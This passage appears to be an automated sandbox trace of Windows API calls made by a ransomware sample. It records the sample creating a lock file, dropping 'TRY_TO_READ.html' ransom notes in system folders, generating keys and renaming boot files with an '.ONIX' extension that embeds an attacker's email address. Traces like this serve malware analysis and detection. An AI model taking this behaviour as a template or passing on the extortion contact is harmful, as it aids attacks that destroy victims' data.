(HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x466528 [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb8) returned 0x46e918 [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a6) returned 0x47b958 [0064.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b958 | out: hHeap=0x410000) returned 1 [0064.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466518 | out: hHeap=0x410000) returned 1 [0064.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e9d8 | out: hHeap=0x410000) returned 1 [0064.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466528 | out: hHeap=0x410000) returned 1 [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6) returned 0x466528 [0064.922] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4664f8 | out: hHeap=0x410000) returned 1 [0064.922] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466508 | out: hHeap=0x410000) returned 1 [0064.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466508 [0064.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4664f8 [0064.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471f60 [0064.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471e70 [0064.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fb0 [0064.922] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.931] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x245)) [0064.932] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0064.932] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0064.932] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0064.932] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\9c354ca09c354b444c.lock") returned 26 [0064.932] CreateFileW (lpFileName="C:\\9c354ca09c354b444c.lock" (normalized: "c:\\9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0064.936] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.936] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.936] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fb0 | out: hHeap=0x410000) returned 1 [0064.936] FindFirstFileW (in: lpFileName="C:\\\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x447368 [0064.936] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.938] GetLastError () returned 0x0 [0064.938] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0064.938] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x46e068 [0064.938] SetLastError (dwErrCode=0x0) [0064.938] GetLastError () returned 0x0 [0064.938] SetLastError (dwErrCode=0x0) [0064.938] GetLastError () returned 0x0 [0064.938] SetLastError (dwErrCode=0x0) [0064.938] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fb0 [0064.938] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fd8 [0064.938] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fb0 | out: hHeap=0x410000) returned 1 [0064.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fd8 | out: hHeap=0x410000) returned 1 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fd8 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466538 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466548 [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.939] GetLastError () returned 0x0 [0064.939] SetLastError (dwErrCode=0x0) [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0064.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.939] GetLastError () returned 0x0 [0064.939] SetLastError (dwErrCode=0x0) [0064.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b2c8 [0064.939] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.940] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.940] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.941] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.942] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.942] CloseHandle (hObject=0x3d4) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466548 | out: hHeap=0x410000) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466538 | out: hHeap=0x410000) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.943] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x3064ec90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3064ec90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3064ec90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9c354ca09c354b444c.lock", cAlternateFileName="9C354C~1.LOC")) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.943] GetLastError () returned 0x0 [0064.943] SetLastError (dwErrCode=0x0) [0064.943] GetLastError () returned 0x0 [0064.943] SetLastError (dwErrCode=0x0) [0064.943] GetLastError () returned 0x0 [0064.943] SetLastError (dwErrCode=0x0) [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x46a470 [0064.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466538 [0064.943] CreateFileW (lpFileName="C:\\\\9c354ca09c354b444c.lock" (normalized: "c:\\9c354ca09c354b444c.lock"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.944] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.944] CreateFileW (lpFileName="C:\\\\9c354ca09c354b444c.lock" (normalized: "c:\\9c354ca09c354b444c.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.944] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.944] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x46a470 | out: pbBuffer=0x46a470) returned 1 [0064.945] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466538 | out: pbBuffer=0x466538) returned 1 [0064.945] SetFileAttributesW (lpFileName="C:\\\\9c354ca09c354b444c.lock", dwFileAttributes=0x80) returned 1 [0064.945] lstrlenW (lpString="C:\\\\9c354ca09c354b444c.lock") returned 27 [0064.945] GetProcessHeap () returned 0x410000 [0064.945] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa6) returned 0x461440 [0064.945] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\9c354ca09c354b444c.lock" | out: lpString1="C:\\\\9c354ca09c354b444c.lock") returned="C:\\\\9c354ca09c354b444c.lock" [0064.945] lstrcatW (in: lpString1="C:\\\\9c354ca09c354b444c.lock", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\9c354ca09c354b444c.lock.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\9c354ca09c354b444c.lock.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.945] GetProcessHeap () returned 0x410000 [0064.945] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0064.945] CloseHandle (hObject=0xffffffff) returned 0 [0064.946] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.946] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0064.946] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.946] GetLastError () returned 0x6 [0064.946] SetLastError (dwErrCode=0x6) [0064.946] GetLastError () returned 0x6 [0064.946] SetLastError (dwErrCode=0x6) [0064.946] GetLastError () returned 0x6 [0064.946] SetLastError (dwErrCode=0x6) [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fb0 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466548 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466558 [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.946] GetLastError () returned 0x6 [0064.946] SetLastError (dwErrCode=0x6) [0064.946] GetLastError () returned 0x6 [0064.946] SetLastError (dwErrCode=0x6) [0064.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.947] CreateFileW (lpFileName="C:\\\\Boot\\TRY_TO_READ.html" (normalized: "c:\\boot\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.956] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.957] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.957] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.957] CloseHandle (hObject=0x3d4) returned 1 [0064.957] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.957] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466558 | out: hHeap=0x410000) returned 1 [0064.957] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466548 | out: hHeap=0x410000) returned 1 [0064.957] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0064.957] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0064.958] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.958] GetLastError () returned 0x0 [0064.958] SetLastError (dwErrCode=0x0) [0064.958] GetLastError () returned 0x0 [0064.958] SetLastError (dwErrCode=0x0) [0064.958] GetLastError () returned 0x0 [0064.958] SetLastError (dwErrCode=0x0) [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.958] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.958] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x4542f0 [0064.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466548 [0064.958] CreateFileW (lpFileName="C:\\\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.959] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.959] CreateFileW (lpFileName="C:\\\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.959] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4542f0 | out: pbBuffer=0x4542f0) returned 1 [0064.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466548 | out: pbBuffer=0x466548) returned 1 [0064.960] SetFileAttributesW (lpFileName="C:\\\\bootmgr", dwFileAttributes=0x80) returned 0 [0064.960] lstrlenW (lpString="C:\\\\bootmgr") returned 11 [0064.960] GetProcessHeap () returned 0x410000 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x86) returned 0x461440 [0064.960] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\bootmgr" | out: lpString1="C:\\\\bootmgr") returned="C:\\\\bootmgr" [0064.960] lstrcatW (in: lpString1="C:\\\\bootmgr", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\bootmgr.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\bootmgr.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.960] GetProcessHeap () returned 0x410000 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0064.960] CloseHandle (hObject=0xffffffff) returned 0 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0064.960] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.960] GetLastError () returned 0x6 [0064.960] SetLastError (dwErrCode=0x6) [0064.960] GetLastError () returned 0x6 [0064.960] SetLastError (dwErrCode=0x6) [0064.960] GetLastError () returned 0x6 [0064.960] SetLastError (dwErrCode=0x6) [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.960] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x472448 [0064.961] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466558 [0064.961] CreateFileW (lpFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.961] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.961] CreateFileW (lpFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.962] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.962] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x472448 | out: pbBuffer=0x472448) returned 1 [0064.962] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466558 | out: pbBuffer=0x466558) returned 1 [0064.962] SetFileAttributesW (lpFileName="C:\\\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1 [0064.962] lstrlenW (lpString="C:\\\\BOOTSECT.BAK") returned 16 [0064.962] GetProcessHeap () returned 0x410000 [0064.962] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x461440 [0064.962] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\BOOTSECT.BAK" | out: lpString1="C:\\\\BOOTSECT.BAK") returned="C:\\\\BOOTSECT.BAK" [0064.962] lstrcatW (in: lpString1="C:\\\\BOOTSECT.BAK", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\BOOTSECT.BAK.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\BOOTSECT.BAK.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.962] GetProcessHeap () returned 0x410000 [0064.962] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0064.962] CloseHandle (hObject=0xffffffff) returned 0 [0064.962] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.962] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0064.962] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.962] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.962] GetLastError () returned 0x6 [0064.963] SetLastError (dwErrCode=0x6) [0064.963] GetLastError () returned 0x6 [0064.963] SetLastError (dwErrCode=0x6) [0064.963] GetLastError () returned 0x6 [0064.963] SetLastError (dwErrCode=0x6) [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472050 [0064.963] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0064.963] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472050 | out: hHeap=0x410000) returned 1 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472050 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472078 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466568 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466578 [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.963] GetLastError () returned 0x6 [0064.963] SetLastError (dwErrCode=0x6) [0064.963] GetLastError () returned 0x6 [0064.963] SetLastError (dwErrCode=0x6) [0064.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.963] CreateFileW (lpFileName="C:\\\\Config.Msi\\TRY_TO_READ.html" (normalized: "c:\\config.msi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.964] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.964] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.964] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.965] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.965] CloseHandle (hObject=0x3d4) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466578 | out: hHeap=0x410000) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 